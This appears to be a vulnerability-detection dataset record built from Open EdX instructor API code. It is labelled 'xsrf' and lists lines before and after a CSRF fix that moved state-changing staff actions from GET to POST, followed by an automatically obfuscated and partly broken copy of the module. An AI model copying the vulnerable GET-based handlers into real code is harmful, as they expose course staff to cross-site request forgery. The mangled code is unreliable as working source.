student = get_student_from_identifier(student_identifier)
__, created = EntranceExamConfiguration.objects.get_or_create(user=student, course_id=course_id)
if created:
message = _('This student (%s) will skip the entrance exam.') % student_identifier
else:
message = _('This student (%s) is already allowed to skip the entrance exam.') % student_identifier
response_payload = {
'message': message,
}
return JsonResponse(response_payload)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_POST
def start_certificate_generation(request, course_id):
"""
Start generating certificates for all students enrolled in given course.
"""
course_key = CourseKey.from_string(course_id)
task = instructor_task.api.generate_certificates_for_students(request, course_key)
message = _('Certificate generation task for all students of this course has been started. '
'You can view the status of the generation task in the "Pending Tasks" section.')
response_payload = {
'message': message,
'task_id': task.task_id
}
return JsonResponse(response_payload)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_POST
def start_certificate_regeneration(request, course_id):
"""
Start regenerating certificates for students whose certificate statuses lie with in 'certificate_statuses'
entry in POST data.
"""
course_key = CourseKey.from_string(course_id)
certificates_statuses = request.POST.getlist('certificate_statuses', [])
if not certificates_statuses:
return JsonResponse(
{'message': _('Please select one or more certificate statuses that require certificate regeneration.')},
status=400
)
# Check if the selected statuses are allowed
allowed_statuses = [CertificateStatuses.downloadable, CertificateStatuses.error, CertificateStatuses.notpassing]
if not set(certificates_statuses).issubset(allowed_statuses):
return JsonResponse(
{'message': _('Please select certificate statuses from the list only.')},
status=400
)
try:
instructor_task.api.regenerate_certificates(request, course_key, certificates_statuses)
except AlreadyRunningError as error:
return JsonResponse({'message': error.message}, status=400)
response_payload = {
'message': _('Certificate regeneration task has been started. '
'You can view the status of the generation task in the "Pending Tasks" section.'),
'success': True
}
return JsonResponse(response_payload)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_http_methods(['POST', 'DELETE'])
def certificate_exception_view(request, course_id):
"""
Add/Remove students to/from certificate white list.
:param request: HttpRequest object
:param course_id: course identifier of the course for whom to add/remove certificates exception.
:return: JsonResponse object with success/error message or certificate exception data.
"""
course_key = CourseKey.from_string(course_id)
# Validate request data and return error response in case of invalid data
try:
certificate_exception, student = parse_request_data_and_get_user(request, course_key)
except ValueError as error:
return JsonResponse({'success': False, 'message': error.message}, status=400)
# Add new Certificate Exception for the student passed in request data
if request.method == 'POST':
try:
exception = add_certificate_exception(course_key, student, certificate_exception)
except ValueError as error:
return JsonResponse({'success': False, 'message': error.message}, status=400)
return JsonResponse(exception)
# Remove Certificate Exception for the student passed in request data
elif request.method == 'DELETE':
try:
remove_certificate_exception(course_key, student)
except ValueError as error:
return JsonResponse({'success': False, 'message': error.message}, status=400)
return JsonResponse({}, status=204)
def add_certificate_exception(course_key, student, certificate_exception):
"""
Add a certificate exception to CertificateWhitelist table.
Raises ValueError in case Student is already white listed.
:param course_key: identifier of the course whose certificate exception will be added.
:param student: User object whose certificate exception will be added.
:param certificate_exception: A dict object containing certificate exception info.
:return: CertificateWhitelist item in dict format containing certificate exception info.
"""
if len(CertificateWhitelist.get_certificate_white_list(course_key, student)) > 0:
raise ValueError(
_("Student (username/email={user}) already in certificate exception list.").format(user=student.username)
)
certificate_white_list, __ = CertificateWhitelist.objects.get_or_create(
user=student,
course_id=course_key,
defaults={
'whitelist': True,
'notes': certificate_exception.get('notes', '')
}
)
generated_certificate = GeneratedCertificate.eligible_certificates.filter(
user=student,
course_id=course_key,
status=CertificateStatuses.downloadable,
).first()
exception = dict({
'id': certificate_white_list.id,
'user_email': student.email,
'user_name': student.username,
'user_id': student.id,
'certificate_generated': generated_certificate and generated_certificate.created_date.strftime("%B %d, %Y"),
'created': certificate_white_list.created.strftime("%A, %B %d, %Y"),
})
return exception
def remove_certificate_exception(course_key, student):
"""
Remove certificate exception for given course and student from CertificateWhitelist table and
invalidate its GeneratedCertificate if present.
Raises ValueError in case no exception exists for the student in the given course.
:param course_key: identifier of the course whose certificate exception needs to be removed.
:param student: User object whose certificate exception needs to be removed.
:return:
"""
try:
certificate_exception = CertificateWhitelist.objects.get(user=student, course_id=course_key)
except ObjectDoesNotExist:
raise ValueError(
_('Certificate exception (user={user}) does not exist in certificate white list. '
'Please refresh the page and try again.').format(user=student.username)
)
try:
generated_certificate = GeneratedCertificate.objects.get( # pylint: disable=no-member
user=student,
course_id=course_key
)
generated_certificate.invalidate()
log.info(
u'Certificate invalidated for %s in course %s when removed from certificate exception list',
student.username,
course_key
)
except ObjectDoesNotExist:
# Certificate has not been generated yet, so just remove the certificate exception from white list
pass
certificate_exception.delete()
def parse_request_data_and_get_user(request, course_key):
"""
Parse request data into Certificate Exception and User object.
Certificate Exception is the dict object containing information about certificate exception.
:param request:
:param course_key: Course Identifier of the course for whom to process certificate exception
:return: key-value pairs containing certificate exception data and User object
"""
certificate_exception = parse_request_data(request)
user = certificate_exception.get('user_name', '') or certificate_exception.get('user_email', '')
if not user:
raise ValueError(_('Student username/email field is required and can not be empty. '
'Kindly fill in username/email and then press "Add to Exception List" button.'))
db_user = get_student(user, course_key)
return certificate_exception, db_user
def parse_request_data(request):
"""
Parse and return request data, raise ValueError in case of invalid JSON data.
:param request: HttpRequest request object.
:return: dict object containing parsed json data.
"""
try:
data = json.loads(request.body or '{}')
except ValueError:
raise ValueError(_('The record is not in the correct format. Please add a valid username or email address.'))
return data
def get_student(username_or_email, course_key):
"""
Retrieve and return User object from db, raise ValueError
if user is does not exists or is not enrolled in the given course.
:param username_or_email: String containing either user name or email of the student.
:param course_key: CourseKey object identifying the current course.
:return: User object
"""
try:
student = get_user_by_username_or_email(username_or_email)
except ObjectDoesNotExist:
raise ValueError(_("{user} does not exist in the LMS. Please check your spelling and retry.").format(
user=username_or_email
))
# Make Sure the given student is enrolled in the course
if not CourseEnrollment.is_enrolled(student, course_key):
raise ValueError(_("{user} is not enrolled in this course. Please check your spelling and retry.")
.format(user=username_or_email))
return student
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_POST
def generate_certificate_exceptions(request, course_id, generate_for=None):
"""
Generate Certificate for students in the Certificate White List.
:param request: HttpRequest object,
:param course_id: course identifier of the course for whom to generate certificates
:param generate_for: string to identify whether to generate certificates for 'all' or 'new'
additions to the certificate white-list
:return: JsonResponse object containing success/failure message and certificate exception data
"""
course_key = CourseKey.from_string(course_id)
if generate_for == 'all':
# Generate Certificates for all white listed students
students = 'all_whitelisted'
elif generate_for == 'new':
students = 'whitelisted_not_generated'
else:
# Invalid data, generate_for must be present for all certificate exceptions
return JsonResponse(
{
'success': False,
'message': _('Invalid data, generate_for must be "new" or "all".'),
},
status=400
)
instructor_task.api.generate_certificates_for_students(request, course_key, student_set=students)
response_payload = {
'success': True,
'message': _('Certificate generation started for white listed students.'),
}
return JsonResponse(response_payload)
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_POST
def generate_bulk_certificate_exceptions(request, course_id): # pylint: disable=invalid-name
"""
Add Students to certificate white list from the uploaded csv file.
:return response in dict format.
{
general_errors: [errors related to csv file e.g. csv uploading, csv attachment, content reading etc. ],
row_errors: {
data_format_error: [users/data in csv file that are not well formatted],
user_not_exist: [csv with none exiting users in LMS system],
user_already_white_listed: [users that are already white listed],
user_not_enrolled: [rows with not enrolled users in the given course]
},
success: [list of successfully added users to the certificate white list model]
}
"""
user_index = 0
notes_index = 1
row_errors_key = ['data_format_error', 'user_not_exist', 'user_already_white_listed', 'user_not_enrolled']
course_key = CourseKey.from_string(course_id)
students, general_errors, success = [], [], []
row_errors = {key: [] for key in row_errors_key}
def build_row_errors(key, _user, row_count):
"""
inner method to build dict of csv data as row errors.
"""
row_errors[key].append(_('user "{user}" in row# {row}').format(user=_user, row=row_count))
if 'students_list' in request.FILES:
try:
upload_file = request.FILES.get('students_list')
if upload_file.name.endswith('.csv'):
students = [row for row in csv.reader(upload_file.read().splitlines())]
else:
general_errors.append(_('Make sure that the file you upload is in CSV format with no '
'extraneous characters or rows.'))
except Exception: # pylint: disable=broad-except
general_errors.append(_('Could not read uploaded file.'))
finally:
upload_file.close()
row_num = 0
for student in students:
row_num += 1
# verify that we have exactly two column in every row either email or username and notes but allow for
# blank lines
if len(student) != 2:
if len(student) > 0:
build_row_errors('data_format_error', student[user_index], row_num)
log.info(u'invalid data/format in csv row# %s', row_num)
continue
user = student[user_index]
try:
user = get_user_by_username_or_email(user)
except ObjectDoesNotExist:
build_row_errors('user_not_exist', user, row_num)
log.info(u'student %s does not exist', user)
else:
if len(CertificateWhitelist.get_certificate_white_list(course_key, user)) > 0:
build_row_errors('user_already_white_listed', user, row_num)
log.warning(u'student %s already exist.', user.username)
# make sure user is enrolled in course
elif not CourseEnrollment.is_enrolled(user, course_key):
build_row_errors('user_not_enrolled', user, row_num)
log.warning(u'student %s is not enrolled in course.', user.username)
else:
CertificateWhitelist.objects.create(
user=user,
course_id=course_key,
whitelist=True,
notes=student[notes_index]
)
success.append(_('user "{username}" in row# {row}').format(username=user.username, row=row_num))
else:
general_errors.append(_('File is not attached.'))
results = {
'general_errors': general_errors,
'row_errors': row_errors,
'success': success
}
return JsonResponse(results)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_http_methods(['POST', 'DELETE'])
def certificate_invalidation_view(request, course_id):
"""
Invalidate/Re-Validate students to/from certificate.
:param request: HttpRequest object
:param course_id: course identifier of the course for whom to add/remove certificates exception.
:return: JsonResponse object with success/error message or certificate invalidation data.
"""
course_key = CourseKey.from_string(course_id)
# Validate request data and return error response in case of invalid data
try:
certificate_invalidation_data = parse_request_data(request)
certificate = validate_request_data_and_get_certificate(certificate_invalidation_data, course_key)
except ValueError as error:
return JsonResponse({'message': error.message}, status=400)
# Invalidate certificate of the given student for the course course
if request.method == 'POST':
try:
certificate_invalidation = invalidate_certificate(request, certificate, certificate_invalidation_data)
except ValueError as error:
return JsonResponse({'message': error.message}, status=400)
return JsonResponse(certificate_invalidation)
# Re-Validate student certificate for the course course
elif request.method == 'DELETE':
try:
re_validate_certificate(request, course_key, certificate)
except ValueError as error:
return JsonResponse({'message': error.message}, status=400)
return JsonResponse({}, status=204)
def invalidate_certificate(request, generated_certificate, certificate_invalidation_data):
"""
Invalidate given GeneratedCertificate and add CertificateInvalidation record for future reference or re-validation.
:param request: HttpRequest object
:param generated_certificate: GeneratedCertificate object, the certificate we want to invalidate
:param certificate_invalidation_data: dict object containing data for CertificateInvalidation.
:return: dict object containing updated certificate invalidation data.
"""
if len(CertificateInvalidation.get_certificate_invalidations(
generated_certificate.course_id,
generated_certificate.user,
)) > 0:
raise ValueError(
_("Certificate of {user} has already been invalidated. Please check your spelling and retry.").format(
user=generated_certificate.user.username,
)
)
# Verify that certificate user wants to invalidate is a valid one.
if not generated_certificate.is_valid():
raise ValueError(
_("Certificate for student {user} is already invalid, kindly verify that certificate was generated "
"for this student and then proceed.").format(user=generated_certificate.user.username)
)
# Add CertificateInvalidation record for future reference or re-validation
certificate_invalidation, __ = CertificateInvalidation.objects.update_or_create(
generated_certificate=generated_certificate,
defaults={
'invalidated_by': request.user,
'notes': certificate_invalidation_data.get("notes", ""),
'active': True,
}
)
# Invalidate GeneratedCertificate
generated_certificate.invalidate()
return {
'id': certificate_invalidation.id,
'user': certificate_invalidation.generated_certificate.user.username,
'invalidated_by': certificate_invalidation.invalidated_by.username,
'created': certificate_invalidation.created.strftime("%B %d, %Y"),
'notes': certificate_invalidation.notes,
}
def re_validate_certificate(request, course_key, generated_certificate):
"""
Remove certificate invalidation from db and start certificate generation task for this student.
Raises ValueError if certificate invalidation is present.
:param request: HttpRequest object
:param course_key: CourseKey object identifying the current course.
:param generated_certificate: GeneratedCertificate object of the student for the given course
"""
try:
# Fetch CertificateInvalidation object
certificate_invalidation = CertificateInvalidation.objects.get(generated_certificate=generated_certificate)
except ObjectDoesNotExist:
raise ValueError(_("Certificate Invalidation does not exist, Please refresh the page and try again."))
else:
# Deactivate certificate invalidation if it was fetched successfully.
certificate_invalidation.deactivate()
# We need to generate certificate only for a single student here
student = certificate_invalidation.generated_certificate.user
instructor_task.api.generate_certificates_for_students(
request, course_key, student_set="specific_student", specific_student_id=student.id
)
def validate_request_data_and_get_certificate(certificate_invalidation, course_key):
"""
Fetch and return GeneratedCertificate of the student passed in request data for the given course.
Raises ValueError in case of missing student username/email or
if student does not have certificate for the given course.
:param certificate_invalidation: dict containing certificate invalidation data
:param course_key: CourseKey object identifying the current course.
:return: GeneratedCertificate object of the student for the given course
"""
user = certificate_invalidation.get("user")
if not user:
raise ValueError(
_('Student username/email field is required and can not be empty. '
'Kindly fill in username/email and then press "Invalidate Certificate" button.')
)
student = get_student(user, course_key)
certificate = GeneratedCertificate.certificate_for_student(student, course_key)
if not certificate:
raise ValueError(_(
"The student {student} does not have certificate for the course {course}. Kindly verify student "
"username/email and the selected course are correct and try again."
).format(student=student.username, course=course_key.course))
return certificate
| xsrf | {
"code": [
"def require_query_params(*args, **kwargs):",
" Checks for required paremters or renders a 400 error.",
" `args` is a *list of required GET parameter names.",
" to string explanations of the parameter",
" required_params = []",
" required_params += [(arg, None) for arg in args]",
" required_params += [(key, kwargs[key]) for key in kwargs]",
" request = args[0]",
" error_response_data = {",
" 'error': 'Missing required query parameter(s)',",
" 'parameters': [],",
" 'info': {},",
" }",
" for (param, extra) in required_params:",
" default = object()",
" if request.GET.get(param, default) == default:",
" error_response_data['parameters'].append(param)",
" error_response_data['info'][param] = extra",
" if len(error_response_data['parameters']) > 0:",
" return JsonResponse(error_response_data, status=400)",
" else:",
" return func(*args, **kwargs)",
" return wrapped",
" return decorator",
" POST parameters rather than GET parameters.",
"@require_query_params(",
" user = get_student_from_identifier(request.GET.get('unique_student_identifier'))",
" 'unique_student_identifier': request.GET.get('unique_student_identifier'),",
" rolename = request.GET.get('rolename')",
" action = request.GET.get('action')",
"@require_query_params(rolename=\"'instructor', 'staff', or 'beta'\")",
" rolename = request.GET.get('rolename')",
" problem_location = request.GET.get('problem_location', '')",
"@require_query_params(",
" user = get_student_from_identifier(request.GET.get('unique_student_identifier'))",
"@require_query_params(",
" problem_to_reset = strip_if_string(request.GET.get('problem_to_reset'))",
" student_identifier = request.GET.get('unique_student_identifier', None)",
" all_students = request.GET.get('all_students', False) in ['true', 'True', True]",
" delete_module = request.GET.get('delete_module', False) in ['true', 'True', True]",
" student_identifier = request.GET.get('unique_student_identifier', None)",
" all_students = request.GET.get('all_students', False) in ['true', 'True', True]",
" delete_module = request.GET.get('delete_module', False) in ['true', 'True', True]",
"@require_query_params(problem_to_reset=\"problem urlname to reset\")",
" problem_to_reset = strip_if_string(request.GET.get('problem_to_reset'))",
" student_identifier = request.GET.get('unique_student_identifier', None)",
" all_students = request.GET.get('all_students') in ['true', 'True', True]",
" student_identifier = request.GET.get('unique_student_identifier', None)",
" all_students = request.GET.get('all_students') in ['true', 'True', True]",
" problem_location_str = strip_if_string(request.GET.get('problem_location_str', False))",
" student = request.GET.get('unique_student_identifier', None)",
" student = request.GET.get('unique_student_identifier', None)",
"@require_query_params('rolename')",
" rolename = request.GET.get('rolename')",
"@require_query_params(",
" unique_student_identifier = request.GET.get('unique_student_identifier')",
" rolename = request.GET.get('rolename')",
" action = request.GET.get('action')",
"@require_query_params('student', 'url', 'due_datetime')",
" student = require_student_from_identifier(request.GET.get('student'))",
" unit = find_unit(course, request.GET.get('url'))",
" due_date = parse_datetime(request.GET.get('due_datetime'))",
"@require_query_params('student', 'url')",
" student = require_student_from_identifier(request.GET.get('student'))",
" unit = find_unit(course, request.GET.get('url'))",
"@require_query_params('url')",
" unit = find_unit(course, request.GET.get('url'))",
"@require_query_params('student')",
" student = require_student_from_identifier(request.GET.get('student'))",
"@csrf_exempt"
],
"line_no": [
143,
145,
148,
150,
152,
153,
154,
159,
161,
162,
163,
164,
165,
167,
168,
169,
170,
171,
173,
174,
175,
176,
177,
178,
187,
855,
877,
880,
895,
896,
934,
959,
999,
1908,
1922,
1937,
1964,
1965,
1969,
1970,
2052,
2056,
2057,
2091,
2106,
2107,
2112,
2164,
2169,
2246,
2247,
2290,
2426,
2445,
2545,
2572,
2573,
2574,
2635,
2641,
2642,
2643,
2656,
2662,
2663,
2682,
2688,
2696,
2702,
3079
]
} | {
"code": [
" `kwargs` is a **dict of required POST parameter names",
"@require_POST",
"@require_POST",
"@require_POST",
"@require_post_params(",
" user = get_student_from_identifier(request.POST.get('unique_student_identifier'))",
" 'unique_student_identifier': request.POST.get('unique_student_identifier'),",
" action = request.POST.get('action')",
"@require_POST",
" rolename = request.POST.get('rolename')",
" problem_location = request.POST.get('problem_location', '')",
"@require_POST",
"@require_POST",
"@require_POST",
"@require_POST",
"@require_POST",
"@require_POST",
"@require_post_params(",
" Takes query parameter unique_student_identifier and if the student exists",
" user = get_student_from_identifier(request.POST.get('unique_student_identifier'))",
"@require_POST",
" problem_to_reset = strip_if_string(request.POST.get('problem_to_reset'))",
" all_students = request.POST.get('all_students', False) in ['true', 'True', True]",
"@require_POST",
" all_students = request.POST.get('all_students', False) in ['true', 'True', True]",
"@require_POST",
"@require_post_params(problem_to_reset=\"problem urlname to reset\")",
" student_identifier = request.POST.get('unique_student_identifier', None)",
" all_students = request.POST.get('all_students') in ['true', 'True', True]",
"@require_POST",
" student_identifier = request.POST.get('unique_student_identifier', None)",
"@require_POST",
"@require_POST",
"@require_POST",
" student = request.POST.get('unique_student_identifier', None)",
"@require_POST",
"@require_POST",
"@require_POST",
"@require_POST",
"@require_POST",
"@require_POST",
"@require_post_params('rolename')",
"@require_POST",
"@require_post_params(",
" unique_student_identifier = request.POST.get('unique_student_identifier')",
" rolename = request.POST.get('rolename')",
" action = request.POST.get('action')",
"@require_POST",
" student = require_student_from_identifier(request.POST.get('student'))",
" unit = find_unit(course, request.POST.get('url'))",
"@require_POST",
" student = require_student_from_identifier(request.POST.get('student'))",
"@require_POST",
"@require_post_params('url')",
"@require_POST",
"@require_post_params('student')"
],
"line_no": [
149,
280,
571,
817,
822,
844,
847,
863,
898,
927,
968,
1196,
1289,
1397,
1448,
1473,
1880,
1885,
1893,
1899,
1911,
1942,
1947,
2000,
2035,
2067,
2071,
2087,
2092,
2124,
2145,
2177,
2196,
2215,
2231,
2261,
2296,
2338,
2364,
2386,
2413,
2417,
2477,
2538,
2565,
2566,
2567,
2625,
2635,
2636,
2647,
2657,
2674,
2678,
2689,
2693
]
} |
import StringIO
import json
import .logging
import re
import time
from django.conf import settings
from django.views.decorators.csrf import ensure_csrf_cookie, csrf_exempt
from django.views.decorators.http import require_POST, require_http_methods
from django.views.decorators.cache import cache_control
from django.core.exceptions import ValidationError, PermissionDenied
from django.core.mail.message import EmailMessage
from django.core.exceptions import ObjectDoesNotExist
from django.db import IntegrityError, transaction
from django.core.urlresolvers import reverse
from django.core.validators import validate_email
from django.utils.translation import ugettext as _
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseForbidden, HttpResponseNotFound
from django.utils.html import strip_tags
from django.shortcuts import redirect
import string
import random
import unicodecsv
import decimal
from VAR_40 import auth
from VAR_40.roles import GlobalStaff, CourseSalesAdminRole, CourseFinanceAdminRole
from util.file import (
store_uploaded_file, course_and_time_based_filename_generator,
FileValidationException, UniversalNewlineIterator
)
from util.json_request import JsonResponse, JsonResponseBadRequest
from instructor.views.instructor_task_helpers import extract_email_features, extract_task_features
from microsite_configuration import microsite
from courseware.access import has_access
from courseware.courses import get_course_with_access, get_course_by_id
from django.contrib.auth.models import User
from django_comment_client.utils import has_forum_access
from django_comment_common.models import (
Role,
FORUM_ROLE_ADMINISTRATOR,
FORUM_ROLE_MODERATOR,
FORUM_ROLE_COMMUNITY_TA,
)
from edxmako.shortcuts import render_to_string
from courseware.models import StudentModule
from shoppingcart.models import (
Coupon,
CourseRegistrationCode,
RegistrationCodeRedemption,
Invoice,
CourseMode,
CourseRegistrationCodeInvoiceItem,
)
from VAR_40.models import (
CourseEnrollment, unique_id_for_user, anonymous_id_for_user,
UserProfile, Registration, EntranceExamConfiguration,
ManualEnrollmentAudit, UNENROLLED_TO_ALLOWEDTOENROLL, ALLOWEDTOENROLL_TO_ENROLLED,
ENROLLED_TO_ENROLLED, ENROLLED_TO_UNENROLLED, UNENROLLED_TO_ENROLLED,
UNENROLLED_TO_UNENROLLED, ALLOWEDTOENROLL_TO_UNENROLLED, DEFAULT_TRANSITION_STATE
)
import instructor_task.api
from instructor_task.api_helper import AlreadyRunningError
from instructor_task.models import ReportStore
import instructor.enrollment as enrollment
from instructor.enrollment import (
get_user_email_language,
enroll_email,
send_mail_to_student,
get_email_params,
send_beta_role_email,
unenroll_email,
)
from instructor.access import list_with_level, allow_access, revoke_access, ROLES, update_forum_role
import instructor_analytics.basic
import instructor_analytics.distributions
import instructor_analytics.csvs
import .csv
from openedx.core.djangoapps.user_api.preferences.api import get_user_preference, set_user_preference
from openedx.core.djangolib.markup import HTML, Text
from instructor.views import INVOICE_KEY
from submissions import api as sub_api # installed from the edx-submissions repository
from certificates import api as certs_api
from certificates.models import CertificateWhitelist, GeneratedCertificate, CertificateStatuses, CertificateInvalidation
from bulk_email.models import CourseEmail, BulkEmailFlag
from VAR_40.models import get_user_by_username_or_email
from .tools import (
dump_student_extensions,
dump_module_extensions,
find_unit,
get_student_from_identifier,
require_student_from_identifier,
handle_dashboard_error,
parse_datetime,
set_due_date_extension,
strip_if_string,
)
from opaque_keys.edx.keys import CourseKey, UsageKey
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from opaque_keys import InvalidKeyError
from openedx.core.djangoapps.course_groups.cohorts import is_course_cohorted
from openedx.core.djangoapps.theming import helpers as theming_helpers
VAR_0 = logging.getLogger(__name__)
def FUNC_0(VAR_1):
def FUNC_83(VAR_9, *VAR_2, **VAR_3): # pylint: disable=missing-docstring
VAR_164 = (VAR_9.is_ajax() or
VAR_9.META.get("HTTP_ACCEPT", "").startswith("application/json"))
try:
return VAR_1(VAR_9, *VAR_2, **VAR_3)
except User.DoesNotExist:
VAR_74 = _("User does not exist.")
if VAR_164:
return JsonResponse({"error": VAR_74}, 400)
else:
return HttpResponseBadRequest(VAR_74)
except AlreadyRunningError:
VAR_74 = _("Task is already running.")
if VAR_164:
return JsonResponse({"error": VAR_74}, 400)
else:
return HttpResponseBadRequest(VAR_74)
return FUNC_83
def FUNC_1(*VAR_2, **VAR_3):
VAR_47 = []
VAR_47 += [(arg, None) for arg in VAR_2]
VAR_47 += [(VAR_160, VAR_3[VAR_160]) for VAR_160 in VAR_3]
def FUNC_84(VAR_1): # pylint: disable=missing-docstring
def FUNC_83(*VAR_2, **VAR_3): # pylint: disable=missing-docstring
VAR_9 = VAR_2[0]
VAR_193 = {
'error': 'Missing required query parameter(s)',
'parameters': [],
'info': {},
}
for (VAR_209, extra) in VAR_47:
VAR_199 = object()
if VAR_9.GET.get(VAR_209, VAR_199) == default:
VAR_193['parameters'].append(VAR_209)
VAR_193['info'][VAR_209] = extra
if len(VAR_193['parameters']) > 0:
return JsonResponse(VAR_193, status=400)
else:
return VAR_1(*VAR_2, **VAR_3)
return FUNC_83
return FUNC_84
def FUNC_2(*VAR_2, **VAR_3):
VAR_47 = []
VAR_47 += [(arg, None) for arg in VAR_2]
VAR_47 += [(VAR_160, VAR_3[VAR_160]) for VAR_160 in VAR_3]
def FUNC_84(VAR_1): # pylint: disable=missing-docstring
def FUNC_83(*VAR_2, **VAR_3): # pylint: disable=missing-docstring
VAR_9 = VAR_2[0]
VAR_193 = {
'error': 'Missing required query parameter(s)',
'parameters': [],
'info': {},
}
for (VAR_209, extra) in VAR_47:
VAR_199 = object()
if VAR_9.POST.get(VAR_209, VAR_199) == default:
VAR_193['parameters'].append(VAR_209)
VAR_193['info'][VAR_209] = extra
if len(VAR_193['parameters']) > 0:
return JsonResponse(VAR_193, status=400)
else:
return VAR_1(*VAR_2, **VAR_3)
return FUNC_83
return FUNC_84
def FUNC_3(VAR_4):
if VAR_4 not in ['instructor', 'staff']:
raise ValueError("unrecognized VAR_4 '{}'".format(VAR_4))
def FUNC_84(VAR_1): # pylint: disable=missing-docstring
def FUNC_83(*VAR_2, **VAR_3): # pylint: disable=missing-docstring
VAR_9 = VAR_2[0]
VAR_65 = get_course_by_id(CourseKey.from_string(VAR_3['course_id']))
if has_access(VAR_9.user, VAR_4, VAR_65):
return VAR_1(*VAR_2, **VAR_3)
else:
return HttpResponseForbidden()
return FUNC_83
return FUNC_84
def FUNC_4(VAR_1):
def FUNC_83(VAR_9, *VAR_2, **VAR_3): # pylint: disable=missing-docstring
if GlobalStaff().has_user(VAR_9.user):
return VAR_1(VAR_9, *VAR_2, **VAR_3)
else:
return HttpResponseForbidden(
u"Must be {platform_name} staff to perform this VAR_57.".format(
platform_name=settings.PLATFORM_NAME
)
)
return FUNC_83
def FUNC_5(VAR_1):
def FUNC_83(VAR_9, VAR_10): # pylint: disable=missing-docstring
try:
VAR_38 = CourseKey.from_string(VAR_10)
except InvalidKeyError:
VAR_0.error(u"Unable to find VAR_65 with VAR_65 VAR_160 %s", VAR_10)
return HttpResponseNotFound()
VAR_165 = auth.user_has_role(VAR_9.user, CourseSalesAdminRole(VAR_38))
if VAR_165:
return VAR_1(VAR_9, VAR_10)
else:
return HttpResponseForbidden()
return FUNC_83
def FUNC_6(VAR_1):
def FUNC_83(VAR_9, VAR_10): # pylint: disable=missing-docstring
try:
VAR_38 = CourseKey.from_string(VAR_10)
except InvalidKeyError:
VAR_0.error(u"Unable to find VAR_65 with VAR_65 VAR_160 %s", VAR_10)
return HttpResponseNotFound()
VAR_165 = auth.user_has_role(VAR_9.user, CourseFinanceAdminRole(VAR_38))
if VAR_165:
return VAR_1(VAR_9, VAR_10)
else:
return HttpResponseForbidden()
return FUNC_83
VAR_5 = 0
VAR_6 = 1
VAR_7 = 2
VAR_8 = 3
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_7(VAR_9, VAR_10): # pylint: disable=too-many-statements
if not microsite.get_value('ALLOW_AUTOMATED_SIGNUPS', settings.FEATURES.get('ALLOW_AUTOMATED_SIGNUPS', False)):
return HttpResponseForbidden()
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_48 = []
VAR_49 = []
VAR_50 = []
if CourseMode.is_white_label(VAR_10):
VAR_24 = CourseMode.DEFAULT_SHOPPINGCART_MODE_SLUG
else:
VAR_24 = None
if 'students_list' in VAR_9.FILES:
VAR_125 = []
try:
VAR_194 = VAR_9.FILES.get('students_list')
if VAR_194.name.endswith('.csv'):
VAR_125 = [row for row in VAR_26.reader(VAR_194.read().splitlines())]
VAR_65 = get_course_by_id(VAR_10)
else:
VAR_50.append({
'username': '', 'email': '',
'response': _('Make sure that the file you upload is in CSV format with no extraneous characters or VAR_124.')
})
except Exception: # pylint: disable=broad-except
VAR_50.append({
'username': '', 'email': '', 'response': _('Could not read uploaded file.')
})
finally:
VAR_194.close()
VAR_12 = []
VAR_166 = 0
for VAR_40 in VAR_125:
VAR_166 = row_num + 1
if len(VAR_40) != 4:
if len(VAR_40) > 0:
VAR_50.append({
'username': '',
'email': '',
'response': _('Data in row #{VAR_166} must have exactly four columns: VAR_14, VAR_15, full VAR_16, and country').format(VAR_166=row_num)
})
continue
VAR_14 = VAR_40[VAR_5]
VAR_15 = VAR_40[VAR_6]
VAR_16 = VAR_40[VAR_7]
VAR_17 = VAR_40[VAR_8][:2]
VAR_25 = get_email_params(VAR_65, True, VAR_168=VAR_9.is_secure())
try:
validate_email(VAR_14) # Raises ValidationError if invalid
except ValidationError:
VAR_49.append({
'username': VAR_15, 'email': VAR_14, 'response': _('Invalid VAR_14 {email_address}.').format(email_address=VAR_14)})
else:
if User.objects.filter(VAR_14=email).exists():
VAR_19 = User.objects.get(VAR_14=email)
if not User.objects.filter(VAR_14=VAR_14, VAR_15=username).exists():
VAR_211 = _(
'An account with VAR_14 {email} exists but the provided VAR_15 {VAR_15} '
'is different. Enrolling anyway with {VAR_14}.'
).format(VAR_14=VAR_14, VAR_15=username)
VAR_48.append({
'username': VAR_15, 'email': VAR_14, 'response': VAR_211
})
VAR_0.warning(u'email %s already exist', VAR_14)
else:
VAR_0.info(
u"user already exists with VAR_15 '%s' and VAR_14 '%s'",
VAR_15,
VAR_14
)
if not CourseEnrollment.is_enrolled(VAR_19, VAR_10):
FUNC_11(
VAR_19=VAR_19,
VAR_10=course_id,
VAR_20=VAR_24,
VAR_21=VAR_9.user,
VAR_22='Enrolling via VAR_26 upload',
VAR_23=UNENROLLED_TO_ENROLLED,
)
enroll_email(VAR_10=course_id, student_email=VAR_14, VAR_60=True, VAR_61=True, VAR_25=email_params)
else:
VAR_18 = FUNC_9(VAR_12)
VAR_56 = FUNC_12(
VAR_14, VAR_15, VAR_16, VAR_17, VAR_18, VAR_10, VAR_24, VAR_9.user, VAR_25
)
VAR_49.extend(VAR_56)
else:
VAR_50.append({
'username': '', 'email': '', 'response': _('File is not attached.')
})
VAR_51 = {
'row_errors': VAR_49,
'general_errors': VAR_50,
'warnings': VAR_48
}
return JsonResponse(VAR_51)
def FUNC_8(VAR_11):
VAR_52 = [
char for char in string.ascii_uppercase + string.digits + string.ascii_lowercase
if char not in 'aAeEiIoOuU1l'
]
return string.join((random.choice(VAR_52) for VAR_72 in range(VAR_11)), '')
def FUNC_9(VAR_12, VAR_13=12):
VAR_18 = FUNC_8(VAR_13)
while VAR_18 in VAR_12:
VAR_18 = FUNC_8(VAR_13)
VAR_12.append(VAR_18)
return VAR_18
